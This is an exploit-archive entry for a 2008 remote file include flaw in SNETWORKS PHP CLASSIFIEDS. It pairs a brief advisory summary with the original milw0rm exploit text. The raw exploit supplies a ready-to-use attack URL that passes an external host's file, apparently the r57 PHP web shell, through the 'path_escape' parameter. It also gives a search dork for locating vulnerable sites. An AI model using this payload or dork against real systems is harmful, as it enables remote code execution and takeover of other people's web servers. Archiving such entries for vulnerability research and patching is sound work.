SNETWORKS PHP CLASSIFIEDS Remote File Include Vulnerability

vendor:

PHP CLASSIFIEDS

by:

Crackers_Child

8.8

CVSS

HIGH

Remote File Include

CWE

Product Name: PHP CLASSIFIEDS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

SNETWORKS PHP CLASSIFIEDS Remote File Include Vulnerability

A remote file include vulnerability exists in SNETWORKS PHP CLASSIFIEDS, which allows an attacker to include a remote file containing arbitrary code and execute it on the vulnerable server. This vulnerability is due to a failure in the application to properly sanitize user-supplied input to the 'path_escape' parameter in the 'config.inc.php' script. An attacker can exploit this issue by enticing an unsuspecting user to follow a malicious URI. Successful exploitation could result in arbitrary code execution in the context of the webserver process.

Mitigation:

The vendor has released a patch to address this issue. Users are advised to upgrade to the latest version.

Source

Exploit-DB raw data:

+______________________________________________By Crackers_Child___________________________________________+

*
*
*    [~] Script.......:       SNETWORKS PHP CLASSIFIEDS
*    [~] Page.........:       http://www.snetworks.biz/
*    [~] Author.......:       Crackers_Child  | cybermilitan@hotmail.com & localexploit@hotmail.com
*    [~] Class........:       Remote File Ä°nclude Vulnerability
*    [~] Demo.........:       http://xxxclassifieds.com/classifieds/
*    [~] Dork.........:       Powered by SNETWORKS PHP CLASSIFIEDS
+_______________________________________________________________________________________________________________________+


+_______________________________________________________________________________________________________________________+
*
*
*    
*
*       [~] Exploit Rfi...:     http://[Taget]/[Path]/config.inc.php?path_escape= http://www.sibersavascilar.com/cr/r57.txt?
*
*
*
*                            
+_______________________________________________________________________________________________________________________+



        [~] Ä°nfo......: Can Yakar . . .
                     



+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
*
*
*       [~] Special Thanx.......:    str0ke, BiyoFrm.com,BiyoSecurity.Net, SiberSavascilar.com And All F3ckers :)
*
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2008-01-05]